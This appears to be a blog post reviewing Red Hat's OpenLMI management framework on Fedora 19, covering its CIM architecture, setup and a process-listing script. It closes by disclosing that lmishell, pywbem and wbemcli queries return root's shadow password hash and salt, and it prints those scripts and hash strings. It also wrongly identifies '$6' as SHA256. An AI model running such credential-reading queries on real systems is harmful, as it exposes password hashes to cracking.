According to the OpenLMI project webpage:
OpenLPI provides a common infrastructure for the management of Linux systems. Capabilities include configuration, management and monitoring of hardware, operating systems, and system services. OpenLMI includes a set of services that can be accessed both locally and remotely, multiple language bindings, standard APIs, and standard scripting interfaces.
OpenLMI is a another attempt by Red Hat to provide unified management of Linux systems. This is not their first attempt to provide such functionality. Their previous (failed) attempt back in the 2010/2011 era was called Matahari and was based on Apache Qpid QMF (AMQP Messaging – Qpid Management Framework). The Matahari agent framework (matahari-*) packages were deprecated in the Red Hat Enterprise Linux 6.3 release.
It is based on DTMF (Distributed Management Task Force) CIM (Common Information Model). Yes, I hear your groans! I also groaned when I first heard about OpenLMI and its use of CIM. I have many scars from using CIM in the late 1990s. In my humble opinion, some of the CIM schemas make no sense except to individual companies. For example the DMTF networking schema was essentially written by Citrix and is probably only used by Citrix. BTW, DMTF used be called the Desktop Management Task Force.
The primary focus of OpenLMI appears to be configuring and managing enterprise hardware, especially storage and networks. OpenLMI can be used on either physical servers or on virtual machine guests. By design, OpenLMI provides a common management interface to multiple versions of Red Hat Enterprise Linux (RHEL) and Fedora. It is intended to provide an abstraction layer to hide much of the complexity of the underlying system from systems administrators.
Architecturally, OpenLMI consists of system management agents installed on a managed system, a controller to manage these agents and provide an interface to them, and client applications or scripts which call the management agents through the controller. OpenLMI leverages existing standard-based infrastructure components already existing in RHEL and Fedora such as Pegasus CIMOM but provides new (OpenLMI) system agents. Note that CIMOM (Common Information Model Object Manager) is also a CIM object. System agents are more commonly called providers in OpenLMI.
Providers currently available include:
- Networking – providers for network management
- Account Management – providers for management of users and groups
- Proxy – generator of provider handing over requests processing to CIMMOM
- Storage Management – providers for management of storage and mounting. It uses Blivet, the former Anaconda storage library, to manage storage.
- Software Management – providers for management of software
OpenLMI does not attempt to deliver a complete systems management solution. It simply provides the low-level functions, capabilities and interfaces (APIs) that can be called from scripts or system management consoles. Supported interfaces include C, C++, Python, Java, and a OpenLMI shell. These interfaces are implemented as language bindings to the underlying system agents.
Fedora 19 does not install OpenLMI by default. An OpenLMI controller and a set of OpenLMI agents must be installed on the system to be managed. Specifically, OpenLMI requires you to install WBEM (Web-Based Enterprise Management) support on your system. Either OpenPegasus or the Small Footprint CIM Broker (SFCB) package can be used. OpenPegasus is an open-source implementation of the DMTF CIM and WBEM standards. It is written in C++ and is a comprehensive implementation. SFCB is a CIM server for resource-constrained and embedded environments. It is written in C and designed to be modular and lightweight. For the purposes of this blog, I used the OpenPegasus package.
If you use the Pegasus package, a user called pegasus is created on your system. You have to set the password for pegasus using the passwd command and then restart the tog-pegasus service.
Another package that I installed was YAWN (Yet Another WBEM Navigator). YAWN is a web browser-based CIM client. It runs under Apache and requires mod-python. Currently YAWN works with SFCB, Pegasus, and OpenWBEM.
To show you how convoluted and unwieldy CIM namespaces can be, let us use YAWN to explore what CIM exposes. If you point your favourite web browser to http://localhost/yawn/, this is the initial webpage that you should be:
Type in localhost as the Host, and click the Login button. After entering the credentials for the pegasus user, you should see a list of namespaces.
Select root/cimv2 and all the CIM classes for root/cimv2 are displayed.
If you select the Linux_UnixProcess class you will see a webpage something like the following:
Click on the Instance names link to get a listing of all instances of Linux_UnixProcess. Essentially, this is a listing of all the processes on your system:
Here is what the output looks like if I get details of instance (process) number 9:
You can also programmatically obtain information from CIMOM about processes and more. Here is an example of how to use the lmishell to get information about processes.
$ cat demo.py
#!/usr/bin/lmishell
c = connect("localhost", "user", "password")
procs = c.root.cimv2.Linux_UnixProcess.instances()
for p in procs:
# print "{} {} {} {}".format(p.handle, p.ParentProcessID, p.Name, p.CreationDate)
print "%6s %6s %s %s" % (p.handle, p.ParentProcessID, p.CreationDate, p.Name)
$ ./demo.py
1 0 systemd 20130711002020.000000-300
2 0 kthreadd 20130711002020.000000-300
3 2 ksoftirqd/0 20130711002020.000000-300
5 2 kworker/0:0H 20130711002020.000000-300
7 2 kworker/u:0H 20130711002020.000000-300
8 2 migration/0 20130711002020.000000-300
9 2 rcu_bh 20130711002020.000000-300
10 2 rcu_sched 20130711002020.000000-300
11 2 watchdog/0 20130711002020.000000-300
12 2 watchdog/1 20130711002020.000000-300
13 2 migration/1 20130711002020.000000-300
14 2 ksoftirqd/1 20130711002020.000000-300
16 2 kworker/1:0H 20130711002020.000000-300
17 2 watchdog/2 20130711002020.000000-300
18 2 migration/2 20130711002020.000000-300
19 2 ksoftirqd/2 20130711002020.000000-300
21 2 kworker/2:0H 20130711002020.000000-300
22 2 watchdog/3 20130711002020.000000-300
23 2 migration/3 20130711002020.000000-300
24 2 ksoftirqd/3 20130711002020.000000-300
26 2 kworker/3:0H 20130711002020.000000-300
27 2 khelper 20130711002020.000000-300
28 2 kdevtmpfs 20130711002020.000000-300
29 2 netns 20130711002020.000000-300
30 2 bdi-default 20130711002020.000000-300
31 2 kintegrityd 20130711002020.000000-300
32 2 kblockd 20130711002020.000000-300
33 2 ata_sff 20130711002020.000000-300
34 2 khubd 20130711002020.000000-300
35 2 md 20130711002020.000000-300
60 2 kswapd0 20130711002020.000000-300
61 2 ksmd 20130711002020.000000-300
62 2 khugepaged 20130711002020.000000-300
63 2 fsnotify_mark 20130711002020.000000-300
64 2 crypto 20130711002020.000000-300
72 2 kthrotld 20130711002020.000000-300
75 2 scsi_eh_0 20130711002020.000000-300
76 2 scsi_eh_1 20130711002020.000000-300
77 2 scsi_eh_2 20130711002020.000000-300
78 2 scsi_eh_3 20130711002020.000000-300
79 2 scsi_eh_4 20130711002020.000000-300
80 2 scsi_eh_5 20130711002020.000000-300
86 2 kpsmoused 20130711002020.000000-300
88 2 deferwq 20130711002020.000000-300
96 2 kauditd 20130711002021.000000-300
149 2 kworker/1:1H 20130711002021.000000-300
151 2 scsi_eh_6 20130711002021.000000-300
152 2 scsi_wq_6 20130711002021.000000-300
153 2 kworker/0:1H 20130711002021.000000-300
154 2 kworker/3:1H 20130711002021.000000-300
157 2 kworker/2:1H 20130711002021.000000-300
166 2 jbd2/sda3-8 20130711002027.000000-300
167 2 ext4-dio-unwrit 20130711002027.000000-300
207 1 systemd-journald 20130711002029.000000-300
217 1 lvmetad 20130711002030.000000-300
235 1 systemd-udevd 20130711002031.000000-300
288 2 hd-audio0 20130711002032.000000-300
309 2 kvm-irqfd-clean 20130711002032.000000-300
335 2 jbd2/sda2-8 20130711002035.000000-300
336 2 ext4-dio-unwrit 20130711002035.000000-300
349 2 jbd2/sda5-8 20130711002037.000000-300
350 2 ext4-dio-unwrit 20130711002037.000000-300
353 2 jbd2/sdb1-8 20130711002038.000000-300
354 2 ext4-dio-unwrit 20130711002038.000000-300
359 1 auditd 20130711002038.000000-300
365 359 audispd 20130711002038.000000-300
367 365 sedispatch 20130711002038.000000-300
375 1 alsactl 20130711002038.000000-300
377 1 python 20130711002038.000000-300
379 1 irqbalance 20130711002038.000000-300
382 1 smartd 20130711002038.000000-300
384 1 rsyslogd 20130711002038.000000-300
388 1 systemd-logind 20130711002038.000000-300
389 1 gpm 20130711002038.000000-300
390 1 cupsd 20130711002038.000000-300
391 1 dbus-daemon 20130711002038.000000-300
393 1 chronyd 20130711002038.000000-300
394 1 gdm 20130711002038.000000-300
395 1 crond 20130711002038.000000-300
396 1 atd 20130711002038.000000-300
401 1 acpid 20130711002038.000000-300
403 1 mcelog 20130711002038.000000-300
407 394 gdm-simple-slave 20130711002038.000000-300
413 1 colord 20130711002045.000000-300
415 1 NetworkManager 20130711002045.000000-300
440 407 Xorg 20130711002045.000000-300
455 1 modem-manager 20130711002045.000000-300
461 1 libvirtd 20130711002045.000000-300
465 1 rpcbind 20130711002045.000000-300
483 1 httpd 20130711002045.000000-300
485 1 sshd 20130711002045.000000-300
488 1 accounts-daemon 20130711002045.000000-300
544 1 sendmail: 20130711002045.000000-300
586 1 sendmail: 20130711002045.000000-300
731 1 console-kit-daemon 20130711002046.000000-300
934 1 upowerd 20130711002047.000000-300
1029 1 rtkit-daemon 20130711002047.000000-300
1095 483 httpd 20130711002048.000000-300
1096 483 httpd 20130711002048.000000-300
1097 483 httpd 20130711002048.000000-300
1098 483 httpd 20130711002048.000000-300
1099 483 httpd 20130711002048.000000-300
1123 1 dnsmasq 20130711002048.000000-300
1269 407 gdm-session-worker 20130711002111.000000-300
1277 1 gnome-keyring-daemon 20130711002115.000000-300
1279 1269 gnome-session 20130711002115.000000-300
1287 1 dbus-launch 20130711002115.000000-300
1288 1 dbus-daemon 20130711002115.000000-300
1352 1 gvfsd 20130711002115.000000-300
1373 1 gvfsd-fuse 20130711002115.000000-300
1447 1 at-spi-bus-launcher 20130711002116.000000-300
1451 1447 dbus-daemon 20130711002116.000000-300
1454 1 at-spi2-registryd 20130711002116.000000-300
1463 1279 gnome-settings-daemon 20130711002116.000000-300
1480 1 pulseaudio 20130711002116.000000-300
1502 1 gvfs-udisks2-volume-monitor 20130711002117.000000-300
1504 1 udisksd 20130711002117.000000-300
1509 1480 gconf-helper 20130711002117.000000-300
1512 1 gconfd-2 20130711002117.000000-300
1515 1 gvfs-gphoto2-volume-monitor 20130711002117.000000-300
1519 1 gvfs-afc-volume-monitor 20130711002117.000000-300
1531 1 gsd-printer 20130711002118.000000-300
1533 1 dconf-service 20130711002118.000000-300
1545 1279 gnome-shell 20130711002118.000000-300
1550 1 ibus-daemon 20130711002118.000000-300
1558 1550 ibus-dconf 20130711002118.000000-300
1561 1 ibus-x11 20130711002118.000000-300
1569 1 gnome-shell-calendar-server 20130711002118.000000-300
1577 1 evolution-source-registry 20130711002119.000000-300
1583 1 mission-control-5 20130711002119.000000-300
1588 1550 ibus-engine-simple 20130711002119.000000-300
1590 1 goa-daemon 20130711002119.000000-300
1624 1279 nm-applet 20130711002119.000000-300
1627 1279 python 20130711002119.000000-300
1632 1279 tracker-miner-fs 20130711002119.000000-300
1633 1279 deja-dup-monitor 20130711002119.000000-300
1635 1279 tracker-store 20130711002119.000000-300
1636 1279 evolution-alarm-notify 20130711002120.000000-300
1656 1279 abrt-applet 20130711002120.000000-300
1674 1 evolution-calendar-factory 20130711002121.000000-300
1694 1279 zeitgeist-datahub 20130711002121.000000-300
1701 1 zeitgeist-daemon 20130711002121.000000-300
1755 1 zeitgeist-fts 20130711002121.000000-300
1808 1755 cat 20130711002121.000000-300
1831 1 evolution-addressbook-factory 20130711002122.000000-300
1873 1 gvfsd-burn 20130711002124.000000-300
3152 2 lpfc_worker_0 20130711034101.000000-300
3155 2 kworker/u:28 20130711034101.000000-300
3156 2 kworker/u:29 20130711034101.000000-300
3764 1 gnome-terminal-server 20130711044843.000000-300
3767 3764 gnome-pty-helper 20130711044843.000000-300
3768 3764 bash 20130711044843.000000-300
6306 415 dhclient 20130711121940.000000-300
6690 1 gvfsd-metadata 20130711131148.000000-300
7069 1 gvfsd-trash 20130711140717.000000-300
7423 2 kworker/3:2 20130711141548.000000-300
7513 1 polkitd 20130711144803.000000-300
8389 2 kworker/2:2 20130711170830.000000-300
8404 2 kworker/1:0 20130711171356.000000-300
8453 2 kworker/1:1 20130711172515.000000-300
8567 1545 firefox 20130711174340.000000-300
8642 483 httpd 20130711174402.000000-300
8644 483 httpd 20130711174403.000000-300
8808 2 kworker/3:0 20130711175401.000000-300
8843 1 cimserver 20130711175750.000000-300
9060 2 kworker/0:0 20130711180701.000000-300
9205 2 flush-8:0 20130711183706.000000-300
9237 2 flush-8:16 20130711190030.000000-300
9260 2 kworker/2:0 20130711190100.000000-300
9589 483 httpd 20130711191642.000000-300
9590 483 httpd 20130711191643.000000-300
9591 483 httpd 20130711191643.000000-300
9906 3764 bash 20130711193523.000000-300
9994 2 kworker/0:1 20130711193700.000000-300
10063 8567 plugin-container 20130711193829.000000-300
10096 1545 nautilus 20130711193959.000000-300
10155 1 cimprovagt 20130711194458.000000-300
10194 1 packagekitd 20130711194803.000000-300
10229 3768 python 20130711194912.000000-300
10230 10155 sh None
10231 10230 ps None
Security in OpenLMI is problematic. For example, I can, as a regular user, return the encoded password of another user if I know the CIMOM username and password.
$ cat demo1.py
#!/bin/lmishell
c = connect("localhost", "username", "passsword")
p = c.root.cimv2.LMI_Account.first_instance(key="name", value="root")
print "{} {}".format (p.Name, p.userPassword)
$ ./demo1.py
root [u'$6$OeHcJ066CyxGYah5$248KbUKRDZ/d8JAbouLsmkLTXZhAQeUMrY8YaMlF5kAQt754logoG9VwuWrLcaCPb0b3lcw0Qui2kBNRmGJNx0']
Note how easy it is the retrieve the encrypted password for root from /etc/shadow. We also get the password encoding scheme (6 = SHA256) and the salt!
$ cat demo2.py
#!/bin/python
import pywbem
url = "https://localhost:5989"
username = "pegasus"
password = "password"
c = pywbem.WBEMConnection(url, (username, password),)
slct = 'select Name, userPassword from LMI_Account where Name = "root"'
#print c.ExecQuery('WQL', slct)[0].tomof()
p = c.ExecQuery('WQL', 'select Name, userPassword from LMI_Account where Name = "root"')
print p[0].tomof()
$ ./demo2.py
instance of LMI_Account {
UserPassword = {"$6$OeHdJ066CyxGYah5$248KbUPRDZ/d8JAbouLsmkLTXZqAQeUMrY8YxMlF2kAQt754lggoG9VsuWrLcaCPb0b4lcw0Qui2kKNRmAJNx0"};
Name = "root";
};
As you can see from the above, this is not a specific problem with lmishell; it is a systematic problem. pywbem is a Python library for making CIM operations over HTTP using the WBEM CIM-XML protocol. YAWN also uses pywbem. In pywbem, the local namespace is root/cimv2.
If you install the sblim-wbemcli package you call also access this data using wbemcli
$ wbemcli -noverify gi -nl 'https://pegasus:password@localhost:5989/root/cimv2:LMI_Account.Name="root",CreationClassName="LMI_Account",SystemCreationClassName="Linux_ComputerSystem",SystemName="ultra.xfpmurphy.com"' localhost:5989/root/cimv2:LMI_Account.Name="root",CreationClassName="LMI_Account",SystemCreationClassName="Linux_ComputerSystem",SystemName="ultra.xfpmurphy.com" -InstanceID= -Caption= -Description= -ElementName="root" -Generation= -InstallDate= -OperationalStatus= -StatusDescriptions= -Status= -HealthState= -CommunicationStatus= -DetailedStatus= -OperatingStatus= -PrimaryStatus= -EnabledState=5 -OtherEnabledState= -RequestedState=12 -EnabledDefault=2 -TimeOfLastStateChange= -AvailableRequestedStates= -TransitioningToState=12 -SystemCreationClassName="Linux_ComputerSystem" -SystemName="ultra.xfpmurphy.com" -CreationClassName="LMI_Account" -Name="root" -UserID="0" -ObjectClass= -Descriptions= -Host="ultra.xfpmurphy.com" -LocalityName= -OrganizationName="" -OU= -SeeAlso= -UserCertificate= -UserPassword="$6$OeHcJ066CyxGYah5$268KbUKRDZ/d8JAGoismkLTXZqAQeUOrY8YxMlF5kAQt754lggoG9VsuWrLcaCPb0b3lcw0Qui2kKNRmGJNx0" -PasswordHistoryDepth= -PasswordExpiration= -ComplexPasswordRulesEnforced= -InactivityTimeout= -MaximumSuccessiveLoginFailures= -LastLogin=20130704161216.000000+000 -UserPasswordEncryptionAlgorithm= -OtherUserPasswordEncryptionAlgorithm= -UserPasswordEncoding=2 -HomeDirectory="/root" -LoginShell="/bin/bash" -PasswordLastChange=20120519000000.000000+000 -PasswordPossibleChange=00000000000000.000000:000 -PasswordExpirationWarning= -PasswordInactivation= -AccountExpiration=
OpenLMI is in the early stage of development. Not all functionality is available. The OpenLMI developers appear to welcome input from interested parties and that is goodness. Will OpenLMI succeed? Possibly if OpenLMI successfully integrates with established control panels like cPanel or Plesk. However, until the security holes in OpenLMI are plugged, no system administrator should deploy OpenLMI on any systems that need to be secure.
